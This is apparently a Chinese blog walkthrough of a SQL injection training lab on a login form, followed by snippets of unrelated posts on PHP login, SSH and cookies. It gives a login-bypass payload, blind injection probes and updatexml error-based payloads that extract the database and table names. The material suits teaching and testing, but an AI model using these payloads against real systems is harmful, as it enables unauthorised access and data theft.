賬號密碼登入介面

2021-08-21 17:20:03 字數 1164 閱讀 8878

後台**:

select username, password from users where username='$uname' and password='$passwd' limit 0,1

輸入賬號:dumb 密碼:dumb2

select username, password from users where username='dumb' and password='dumb2' limit 0,1

繞過登入:

輸入賬號:aaa 密碼:1' or 1=1#

select username, password from users where username='aaa' and password='1' or 1=1#' limit 0,1

sql注入1:盲注

輸入賬號:dumb 密碼:dumb' and length(database())=8#

select username, password from users where username='dumb' and password='dumb' and length(database())=8#' limit 0,1

security

輸入賬號:dumb 密碼:dumb' and ascii(substr(database(),1,1))=115#

select username, password from users where username='dumb' and password='dumb' and ascii(substr(database(),2,1))=115# limit 0,1

sql注入2:報錯

輸入賬號:aaa 密碼:aaa' and updatexml(1,concat(0x23,database()),1)#

select username, password from users where username='aaa' and password='aaa' and updatexml(1,concat(0x23,database()),1)#' limit 0,1

輸入賬號:aaa 密碼:aaa' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

PHP賬號密碼登入

首先做乙個簡易的登入介面 123 4910 將密碼和使用者名稱的值傳到chuli.php頁進行處理 處理 如下 1 取傳遞過來的資料 3 uid post uid 4 pwd post pwd 56 連線資料庫 7 db new mysqli localhost root root test 89 ...

ssh 免賬號密碼登入

ssh是什麼 ssh為一項建立在應用層和傳輸層基礎上的安全協議,為計算機上的shell 殼層 提供安全的傳輸和使用環境。對於筆者這種不擅長伺服器操作的人來說,就是乙個可以遠端登入伺服器的工具 如何使用 ssh root 127.0.0.3 如果ssh伺服器預設埠沒改動的話,回車之後就可以輸入密碼了s...

通過cookie登入以及使用賬號密碼登入

cookie就是讓伺服器知道是同乙個人 即辨別身份的 比如你先登入進入到csdn中 然後複製鏈結重新開啟 會提示你沒有登入 另一種解釋就是帶著賬戶和密碼連線伺服器 瀏覽器的開發者選項中可以看懂cookie 下面的cookie內容是從登入後瀏覽器中複製的 如果不加cookie會提示無法登入 因為你之前...